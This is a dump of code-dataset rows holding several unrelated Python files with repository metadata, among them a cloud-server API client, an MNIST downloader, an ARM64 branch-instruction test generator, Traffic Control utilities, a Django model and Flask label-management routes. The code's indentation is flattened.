data = requests.get(f'{self.api_url}/sizes', headers=self.HEADERS).json()
return data
def get_prices(self):
data = requests.get(f'{self.api_url}/prices', headers=self.HEADERS).json()
return data
def get_balance_data(self):
data = requests.get(f'{self.api_url}/balance_data', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def images(self, param_type):
Errors(parameter=param_type).check_images()
params = {'type': param_type}
data = requests.get(f'{self.api_url}/images', headers=self.HEADERS, params=params).json()
check_data = Errors(data).check_error()
return check_data
def get_ssh_keys(self):
data = requests.get(f'{self.api_url}/account/keys', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def add_ssh_key(self, name, pkey):
data_params = {'name': name,
'public_key': pkey}
data = requests.post(f'{self.api_url}/account/keys',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_ssh_key()
return check_data
def rename_ssh_key(self, name, key_id):
data_params = {'name': name}
data = requests.put(f'{self.api_url}/account/keys/{key_id}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_ssh_key()
return check_data
def delete_ssh_key(self, key_id):
data = requests.delete(f'{self.api_url}/account/keys/{key_id}',
headers=self.HEADERS)
if data.status_code != 204:
check_data = Errors(data.json()).check_ssh_key()
return check_data
else:
return True
def ptr(self, domain, ip):
data_params = {'ptr': domain}
data = requests.put(f'{self.api_url}/ips/{ip}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def get_reglets(self, reglet_id=None):
url = f'{self.api_url}/reglets'
if reglet_id is not None:
url += f'/{reglet_id}'
data = requests.get(url, headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def create_reglet(self, size, image, name=None, isp_license_size=None, ssh_keys=None, backups=None):
data_params = {'size': str(size),
'image': str(image)}
if name is not None:
data_params['name'] = str(name)
if ssh_keys is not None:
data_params['ssh_keys'] = ssh_keys
if backups is not None:
data_params['backups'] = backups
if isp_license_size is not None:
data_params['isp_license_size'] = isp_license_size
data = requests.post(f'{self.api_url}/reglets',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def actions(self, reglet_id, action, size=None, image=None, offline=None, name=None, isp_license_size=None):
Errors(parameter=action).check_actions()
data_params = {'type': action}
if action == 'resize':
if size is not None:
data_params['size'] = size
else:
raise ValueError('Значение size не может быть None')
elif action == 'rebuild' or action == 'restore':
if image is not None:
data_params['image'] = image
else:
raise ValueError('Значение image не может быть None')
elif action == 'clone' or action == 'snapshot':
if offline is not None:
data_params['offline'] = offline
if name is not None:
data_params['name'] = name
elif action == 'resize_isp_license':
if isp_license_size is not None:
data_params['isp_license_size'] = isp_license_size
else:
raise ValueError('Значение isp_license_size не может быть None')
data = requests.post(f'{self.api_url}/reglets/{reglet_id}/actions',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def rename_reglet(self, reglet_id, name):
if name is not None:
data_params = {'name': name}
else:
raise ValueError('Переменная name не может быть None')
data = requests.put(f'{self.api_url}/reglets/{reglet_id}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def delete_reglet(self, reglet_id):
data = requests.delete(f'{self.api_url}/reglets/{reglet_id}',
headers=self.HEADERS)
if data.status_code != 204:
check_data = Errors(data.json()).check_error()
return check_data
else:
return True
def get_removed_reglets(self):
data = requests.get(f'{self.api_url}/removed_servers', headers=self.HEADERS).json()
return data
def get_vnc_url(self, reglet_id):
CloudAPI(self.token).actions(reglet_id, 'generate_vnc_link')
data = requests.get(f'{self.api_url}/reglets/{reglet_id}/vnc_link', headers=self.HEADERS).json()
return data
def get_snapshots(self):
data = requests.get(f'{self.api_url}/snapshots', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def delete_snapshot(self, snap_id):
data = requests.delete(f'{self.api_url}/snapshots/{snap_id}', headers=self.HEADERS)
if data.status_code != 204:
check_data = Errors(data.json()).check_error()
return check_data
else:
return True
def get_additional_ips(self, reglet_id=None, ip=None):
params = {}
if reglet_id is not None:
params['reglet_id'] = reglet_id
if ip is None:
data = requests.get(f'{self.api_url}/ips', headers=self.HEADERS, params=params).json()
else:
data = requests.get(f'{self.api_url}/ips/{ip}', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def add_additional_ips(self, reglet_id, ipv4_count=None, ipv6_count=None):
data_params = {}
if ipv4_count is not None:
data_params['ipv4_count'] = ipv4_count
elif ipv6_count is not None:
data_params['ipv6_count'] = ipv6_count
if data_params is not None:
data_params['reglet_id'] = reglet_id
data = requests.post(f'{self.api_url}/ips', headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
else:
raise ValueError('Не указан ни один из параметров - ipv4_count, ipv6_count')
def delete_additional_ips(self, ip):
if ip is not None:
data = requests.delete(f'{self.api_url}/ips/{ip}', headers=self.HEADERS)
if data.status_code == 204:
return True
else:
check_data = Errors(data.json()).check_error()
return check_data
else:
raise ValueError('Переменная ip не может быть None')
def get_info_action(self, action_id):
data = requests.get(f'{self.api_url}/actions/{action_id}', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def get_vpcs(self):
data = requests.get(f'{self.api_url}/vpcs', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def get_vpcs_info(self, vpcs_id):
data = requests.get(f'{self.api_url}/vpcs/{vpcs_id}', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def add_vpcs(self, name):
data_params = {'name': name}
data = requests.post(f'{self.api_url}/vpcs', headers=self.HEADERS,
data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def rename_vpcs(self, vpcs_id, name):
data_params = {'name': name}
data = requests.put(f'{self.api_url}/vpcs/{vpcs_id}',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def delete_vpcs(self, vpcs_id):
data = requests.delete(f'{self.api_url}/vpcs/{vpcs_id}', headers=self.HEADERS)
if data.status_code == 204:
return True
else:
check_data = Errors(data.json()).check_error()
return check_data
def get_vpcs_members(self, vpcs_id):
data = requests.get(f'{self.api_url}/vpcs/{vpcs_id}/members', headers=self.HEADERS).json()
check_data = Errors(data).check_error()
return check_data
def join_vpcs_member(self, reglet_id, vpcs_id):
data_params = {'resource_id': reglet_id}
data = requests.post(f'{self.api_url}/vpcs/{vpcs_id}/members',
headers=self.HEADERS, data=json.dumps(data_params)).json()
check_data = Errors(data).check_error()
return check_data
def disconnect_vpcs_member(self, reglet_id, vpcs_id):
data = requests.delete(f'{self.api_url}/vpcs/{vpcs_id}/members/{reglet_id}', headers=self.HEADERS)
if data.status_code == 204:
return True
else:
check_data = Errors(data.json()).check_error()
return check_data
| 33.515924 | 114 | 0.601292 | 10,578 | 0.993333 | 0 | 0 | 0 | 0 | 0 | 0 | 1,766 | 0.165837 |
9510db3851814a40d1e201c8697a846d403a09e9
| 731 |
py
|
Python
|
mnist/download.py
|
hiroog/cppapimnist
|
30d7e01954fc43da2eea5fe3ebf034b37e79cfd1
|
[
"MIT"
] | null | null | null |
mnist/download.py
|
hiroog/cppapimnist
|
30d7e01954fc43da2eea5fe3ebf034b37e79cfd1
|
[
"MIT"
] | null | null | null |
mnist/download.py
|
hiroog/cppapimnist
|
30d7e01954fc43da2eea5fe3ebf034b37e79cfd1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import urllib.request
import os
import gzip
DOWNLOAD_URL='http://yann.lecun.com/exdb/mnist/'
file_list=[ 'train-images-idx3-ubyte', 'train-labels-idx1-ubyte', 't10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte' ]
for name in file_list:
if not os.path.exists( name ):
gz_name= name + '.gz'
if not os.path.exists( gz_name ):
print( 'download', gz_name )
with urllib.request.urlopen( DOWNLOAD_URL + gz_name ) as fi:
with open( gz_name, 'wb' ) as fo:
fo.write( fi.read() )
print( 'write', name )
with gzip.open( gz_name, 'rb' ) as fi:
with open( name, 'wb' ) as fo:
fo.write( fi.read() )
| 30.458333 | 118 | 0.575923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.253078 |
951110f9319a47de447b38bde1aba4ab72ddd1bd
| 2,651 |
py
|
Python
|
arch/arm64/tests/a64_tbnz.py
|
Samsung/ADBI
|
3e424c45386b0a36c57211da819021cb1929775a
|
[
"Apache-2.0"
] | 312 |
2016-02-04T11:03:17.000Z
|
2022-03-18T11:30:10.000Z
|
arch/arm64/tests/a64_tbnz.py
|
NickHardwood/ADBI
|
3e424c45386b0a36c57211da819021cb1929775a
|
[
"Apache-2.0"
] | 4 |
2016-02-04T11:05:40.000Z
|
2017-07-27T04:22:27.000Z
|
arch/arm64/tests/a64_tbnz.py
|
NickHardwood/ADBI
|
3e424c45386b0a36c57211da819021cb1929775a
|
[
"Apache-2.0"
] | 85 |
2016-02-04T12:48:30.000Z
|
2021-01-14T06:23:24.000Z
|
import random
from common import *
class test_a64_tbnz(TemplateTest):
def gen_rand(self):
regs = list(set(GPREGS) - {'x0', 'w0'})
while True:
yield {'insn' : random.choice(['tbz', 'tbnz']),
'reg' : random.choice(regs),
'bit' : random.randint(0,63),
'val' : random.randint(0,1),
'label_idx': random.randint(0, self.__label_count - 1)}
def __init__(self):
self.__label_count = 8
self.symbols = [ __name__ + '_addr_' + str(i) for i in xrange(self.__label_count) ]
randvals = random.sample(xrange(0, 0xfffffffffffffff), 2*self.__label_count)
self.branch = randvals[:self.__label_count]
self.nobranch = randvals[self.__label_count:]
def test_begin(self):
yield ' .arch armv8-a'
yield ' .align 2'
yield ' .text'
for i in xrange(0, len(self.symbols), 2):
yield self.symbols[i] + ':'
yield ' ldr\t\tx0, ={0}'.format(hex(self.branch[i]))
yield ' ret'
yield ' .skip %d' % random.randrange(512, 2048, 4)
def gen_testcase(self, nr, insn, reg, bit, val, label_idx):
label = self.symbols[label_idx]
ret_label = self.testcase_name(nr) + '_ret'
if reg.startswith('w'):
v = random.randint(0,0xffffffff)
bit /= 2
else:
v = random.randint(0,0xfffffffffffffff)
if val == 1:
v |= (0x1 << bit)
else:
v &= ~(0x1 << bit)
state = ProcessorState(setreg={reg:v,
'x0':self.nobranch[label_idx],
'x30':ret_label},
reserve=['x0'])
yield state.prepare()
space = '\t' if insn == 'tbnz' else '\t\t'
yield self.testcase_insn(nr, '{insn}{space}{reg}, #{bit}, {label}'.format(**locals()))
yield ret_label + ':'
if (insn == 'tbz' and val == 0) or (insn == 'tbnz' and val != 0):
yield ' // should jump'
x0 = self.branch[label_idx]
else:
yield ' // shouldn\'t jump'
x0 = self.nobranch[label_idx]
yield state.check({'x0':x0})
yield state.restore()
def test_end(self):
for i in xrange(1, len(self.symbols), 2):
yield ' .skip %d' % random.randrange(512, 2048, 4)
yield self.symbols[i] + ':'
yield ' ldr\t\tx0, ={0}'.format(hex(self.branch[i]))
yield ' ret'
| 38.42029 | 94 | 0.488118 | 2,614 | 0.986043 | 2,205 | 0.831762 | 0 | 0 | 0 | 0 | 334 | 0.12599 |
95128ff73c5b19e12278311e5737397a3c5afe40
| 6,943 |
py
|
Python
|
infrastructure/cdn-in-a-box/ort/traffic_ops_ort/utils.py
|
hbeatty/incubator-trafficcontrol
|
13ed991531778c60298eb8f532b2a4862f7cb67b
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1 |
2021-04-11T16:55:27.000Z
|
2021-04-11T16:55:27.000Z
|
infrastructure/cdn-in-a-box/ort/traffic_ops_ort/utils.py
|
hbeatty/incubator-trafficcontrol
|
13ed991531778c60298eb8f532b2a4862f7cb67b
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 3 |
2021-03-12T22:35:02.000Z
|
2021-12-09T23:00:11.000Z
|
infrastructure/cdn-in-a-box/ort/traffic_ops_ort/utils.py
|
hbeatty/incubator-trafficcontrol
|
13ed991531778c60298eb8f532b2a4862f7cb67b
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains miscellaneous utilities, typically dealing with string
manipulation or user input/output
"""
import logging
from sys import stderr
import requests
import typing
def getYesNoResponse(prmpt:str, default:str = None) -> bool:
"""
Utility function to get an interactive yes/no response to the prompt `prmpt`
:param prmpt: The prompt to display to users
:param default: The default response; should be one of ``'y'``, ``"yes"``, ``'n'`` or ``"no"``
(case insensitive)
:raises AttributeError: if 'prmpt' and/or 'default' is/are not strings
:returns: the parsed response as a boolean
"""
if default:
prmpt = prmpt.rstrip().rstrip(':') + '['+default+"]:"
while True:
choice = input(prmpt).lower()
if choice in {'y', 'yes'}:
return True
if choice in {'n', 'no'}:
return False
if not choice and default is not None:
return default.lower() in {'y', 'yes'}
print("Please enter a yes/no response.", file=stderr)
def getTextResponse(uri:str, cookies:dict = None, verify:bool = True) -> str:
"""
Gets the plaintext response body of an HTTP ``GET`` request
:param uri: The full path to a resource for the request
:param cookies: An optional dictionary of cookie names mapped to values
:param verify: If :const:`True`, the SSL keys used to communicate with the full URI will be
verified
:raises ConnectionError: when an error occurs trying to communicate with the server
:raises ValueError: if the server's response cannot be interpreted as a UTF-8 string - e.g.
when the response body is raw binary data but the response headers claim it's UTF-16
"""
logging.info("Getting plaintext response via 'HTTP GET %s'", uri)
response = requests.get(uri, cookies=cookies, verify=verify)
if response.status_code not in range(200, 300):
logging.warning("Status code (%d) seems to indicate failure!", response.status_code)
logging.debug("Response: %r\n%r", response.headers, response.content)
return response.text
def getJSONResponse(uri:str, cookies:dict = None, verify:bool = True) -> dict:
"""
Retrieves a JSON object from some HTTP API
:param uri: The URI to fetch
:param cookies: A dictionary of cookie names mapped to values
:param verify: If this is :const:`True`, the SSL keys will be verified during handshakes with
'https' URIs
:returns: The decoded JSON object
:raises ConnectionError: when an error occurs trying to communicate with the server
:raises ValueError: when the request completes successfully, but the response body
does not represent a JSON-encoded object.
"""
logging.info("Getting JSON response via 'HTTP GET %s", uri)
try:
response = requests.get(uri, cookies=cookies, verify=verify)
except (ValueError, ConnectionError, requests.exceptions.RequestException) as e:
raise ConnectionError from e
if response.status_code not in range(200, 300):
logging.warning("Status code (%d) seems to indicate failure!", response.status_code)
logging.debug("Response: %r\n%r", response.headers, response.content)
return response.json()
def parse_multipart(raw: str) -> typing.List[typing.Tuple[str, str]]:
"""
Parses a multipart/mixed-type payload and returns each contiguous chunk.
:param raw: The raw payload - without any HTTP status line.
:returns: A list where each element is a tuple where the first element is a chunk of the message. All headers are discarded except 'Path', which is the second element of each tuple if it was found in the chunk.
:raises: ValueError if the raw payload cannot be parsed as a multipart/mixed-type message.
>>> testdata = '''MIME-Version: 1.0\\r
... Content-Type: multipart/mixed; boundary="test"\\r
... \\r
... --test\\r
... Content-Type: text/plain; charset=us-ascii\\r
... Path: /path/to/ats/root/directory/etc/trafficserver/fname\\r
... \\r
... # A fake testing file that wasn't generated at all on some date
... CONFIG proxy.config.way.too.many.period.separated.words INT 1
...
... --test\\r
... Content-Type: text/plain; charset=utf8\\r
... Path: /path/to/ats/root/directory/etc/trafficserver/othername\\r
... \\r
... # The same header again
... CONFIG proxy.config.the.same.insane.chain.of.words.again.but.the.last.one.is.different INT 0
...
... --test--\\r
... '''
>>> output = parse_multipart(testdata)
>>> print(output[0][0])
# A fake testing file that wasn't generated at all on some date
CONFIG proxy.config.way.too.many.period.separated.words INT 1
>>> output[0][1]
'/path/to/ats/root/directory/etc/trafficserver/fname'
>>> print(output[1][0])
# The same header again
CONFIG proxy.config.the.same.insane.chain.of.words.again.but.the.last.one.is.different INT 0
>>> output[1][1]
'/path/to/ats/root/directory/etc/trafficserver/othername'
"""
try:
hdr_index = raw.index("\r\n\r\n")
headers = {line.split(':')[0].casefold(): line.split(':')[1] for line in raw[:hdr_index].splitlines()}
except (IndexError, ValueError) as e:
raise ValueError("Invalid or corrupt multipart header") from e
ctype = headers.get("content-type")
if not ctype:
raise ValueError("Message is missing 'Content-Type' header")
try:
param_index = ctype.index(";")
params = {param.split('=')[0].strip(): param.split('=')[1].strip() for param in ctype[param_index+1:].split(';')}
except (IndexError, ValueError) as e:
raise ValueError("Invalid or corrupt 'Content-Type' header") from e
boundary = params.get("boundary", "").strip('"\'')
if not boundary:
raise ValueError("'Content-Type' header missing 'boundary' parameter")
chunks = raw.split(f"--{boundary}")[1:] # ignore prologue
if chunks[-1].strip() != "--":
logging.warning("Final chunk appears invalid - possible bad message payload")
else:
chunks = chunks[:-1]
ret = []
for i, chunk in enumerate(chunks):
try:
hdr_index = chunk.index("\r\n\r\n")
headers = {line.split(':')[0].casefold(): line.split(':')[1] for line in chunk[:hdr_index].splitlines() if line}
except (IndexError, ValueError) as e:
logging.debug("chunk: %s", chunk)
raise ValueError(f"Chunk #{i} poorly formed") from e
ret.append((chunk[hdr_index+4:].replace("\r","").strip(), headers.get("path").strip()))
return ret
| 38.572222 | 211 | 0.715109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,621 | 0.665562 |
9512a6419412924d68f8311278ec236177bb738a
| 138 |
py
|
Python
|
api/models/province.py
|
krosben/api-ctan
|
01d5e29694e6f4e35fbe6797c319b109e5bc1c3f
|
[
"MIT"
] | null | null | null |
api/models/province.py
|
krosben/api-ctan
|
01d5e29694e6f4e35fbe6797c319b109e5bc1c3f
|
[
"MIT"
] | 6 |
2020-06-05T23:40:32.000Z
|
2021-06-10T19:03:25.000Z
|
api/models/province.py
|
krosben/api-ctan
|
01d5e29694e6f4e35fbe6797c319b109e5bc1c3f
|
[
"MIT"
] | null | null | null |
from django.db import models
class Province(models.Model):
name = models.CharField(max_length=50, help_text="Name of the province")
| 23 | 76 | 0.76087 | 106 | 0.768116 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.15942 |
9513d85dbfeb9ed30b03373fa4dafc60c0d1a5b4
| 7,512 |
py
|
Python
|
audino/backend/routes/labels.py
|
UCSD-E4E/Pyrenote
|
bede2cfae9cb543a855d5cb01133b8d7c4abaa1c
|
[
"MIT"
] | 11 |
2021-07-09T21:39:05.000Z
|
2022-03-06T23:11:44.000Z
|
audino/backend/routes/labels.py
|
UCSD-E4E/Pyrenote
|
bede2cfae9cb543a855d5cb01133b8d7c4abaa1c
|
[
"MIT"
] | 120 |
2021-07-08T04:15:18.000Z
|
2022-02-26T00:21:25.000Z
|
audino/backend/routes/labels.py
|
UCSD-E4E/Pyrenote
|
bede2cfae9cb543a855d5cb01133b8d7c4abaa1c
|
[
"MIT"
] | 1 |
2021-10-16T04:55:42.000Z
|
2021-10-16T04:55:42.000Z
|
import sqlalchemy as sa
from flask import jsonify, request
from flask_jwt_extended import jwt_required, get_jwt_identity
import csv
from sqlalchemy.sql.expression import false
from backend import app, db
from backend.models import Label, LabelValue, Project
from .helper_functions import (
check_admin,
check_admin_permissions,
general_error,
missing_data
)
from . import api
@api.route("/labels/<int:label_id>/values", methods=["POST"])
@jwt_required
def add_value_to_label(label_id):
msg, status, request_user = check_admin_permissions(get_jwt_identity())
if msg is not None:
return msg, status
value = request.json.get("value", None)
if not value:
return (
jsonify(message="Please provide a label value!",
type="VALUE_MISSING"), 400,)
try:
label_value = LabelValue(value=value, label_id=label_id)
db.session.add(label_value)
db.session.commit()
db.session.refresh(label_value)
except Exception as e:
if type(e) == sa.exc.IntegrityError:
app.logger.error(e)
return (
jsonify(
message=f"Label Value: {value} already exists!",
type="DUPLICATE_VALUE",
),
409,
)
msg = f"Error adding value to label"
return general_error(msg, e, type="VALUE_CREATION_FAILED")
return (
jsonify(
value_id=label_value.id,
message=f"Value assigned to label",
type="VALUE_ASSIGNED_TO_LABEL",
),
201,
)
@api.route("/labels/<int:label_id>/values/file", methods=["POST"])
@jwt_required
def add_value_to_label_from_file(label_id):
app.logger.info("hello")
msg, status, request_user = check_admin_permissions(get_jwt_identity(),
False)
if msg is not None:
return msg, status
file = request.files.get(str(0))
if not file:
return (
jsonify(message="Please provide a label value!",
type="VALUE_MISSING"), 400,)
app.logger.info("hello")
file = file.read().decode("utf-8-sig")
app.logger.info(file)
app.logger.info(type(file))
data = file.split("\n")
for value in data:
if value == "":
continue
try:
value = value.strip(' \t\n\r')
label_value = LabelValue(value=value, label_id=label_id)
db.session.add(label_value)
db.session.commit()
db.session.refresh(label_value)
except Exception as e:
if type(e) == sa.exc.IntegrityError:
app.logger.error(e)
else:
msg = f"Error adding value to label"
return general_error(msg, e, type="VALUE_CREATION_FAILED")
return (
jsonify(
value_id=label_value.id,
message=f"Value assigned to label",
type="VALUE_ASSIGNED_TO_LABEL",
),
201,
)
@api.route("/labels/<int:label_id>/values", methods=["GET"])
@jwt_required
def get_values_for_label(label_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
values = LabelValue.query.filter_by(label_id=label_id).all()
response = [
{
"value_id": value.id,
"value": value.value,
"created_on": value.created_at.strftime("%B %d, %Y"),
}
for value in values
]
except Exception as e:
return missing_data(f"No values exists for label with id: {label_id}",
additional_log=e)
return (jsonify(values=response), 200)
@api.route("/labels/<int:label_id>/values/<int:label_value_id>",
methods=["GET"])
@jwt_required
def fetch_label_value(label_id, label_value_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
value = LabelValue.query.get(label_value_id)
except Exception as e:
return missing_data(f"No values exists for label with id: {label_id}",
additional_log=e)
return (
jsonify(
values={
"value_id": value.id,
"value": value.value,
"created_on": value.created_at.strftime("%B %d, %Y"),
}
),
200,
)
@api.route("/labels/<int:label_id>/values/<int:label_value_id>",
methods=["DELETE"])
@jwt_required
def delete_label_value(label_id, label_value_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
value = LabelValue.query.get(label_value_id)
db.session.delete(value)
db.session.commit()
except Exception as e:
return missing_data(f"No values exists for value: {label_value_id}",
additional_log=e)
return (
jsonify(
values={
"value_id": value.id,
"value": value.value,
"created_on": value.created_at.strftime("%B %d, %Y"),
}
),
200,
)
@api.route("/labels/<int:label_id>/values/<int:label_value_id>",
methods=["PATCH"])
@jwt_required
def update_value_for_label(label_id, label_value_id):
msg, status, request_user = check_admin_permissions(get_jwt_identity())
if msg is not None:
return msg, status
value = request.json.get("value", None)
if not value:
return (
jsonify(message="Please provide a label value!",
type="VALUE_MISSING"),
400,
)
err = f"Label Value ID: {label_value_id} no exist w/ Label ID: {label_id}"
try:
label_value = LabelValue.query.get(label_value_id)
label_value.set_label_value(value)
db.session.commit()
except Exception as e:
if type(e) == sa.exc.IntegrityError:
app.logger.error(f"Label Value: {value} already exists! {e}")
return (
jsonify(
message=f"Label Value: {value} already exists!",
type="DUPLICATE_VALUE",
),
409,
)
return missing_data(err, additional_log=e)
return (
jsonify(
value_id=label_value.id,
value=label_value.value,
created_on=label_value.created_at.strftime("%B %d, %Y"),
),
200,
)
@api.route("/labels/<int:label_id>/projectId/<int:project_id>",
methods=["DELETE"])
@jwt_required
def delete_label(label_id, project_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
LabelCat = Label.query.get(label_id)
project = Project.query.get(project_id)
LabelValues = LabelValue.query.filter_by(label_id=label_id).all()
for value in LabelValues:
db.session.delete(value)
db.session.commit()
project.labels.remove(LabelCat)
db.session.delete(LabelCat)
db.session.commit()
except Exception as e:
message = f"No value found with value id: {LabelCat}"
return missing_data(message, additional_log=e)
return (jsonify(message="success"), 200)
| 29.574803 | 78 | 0.580804 | 0 | 0 | 0 | 0 | 7,097 | 0.944755 | 0 | 0 | 1,301 | 0.17319 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.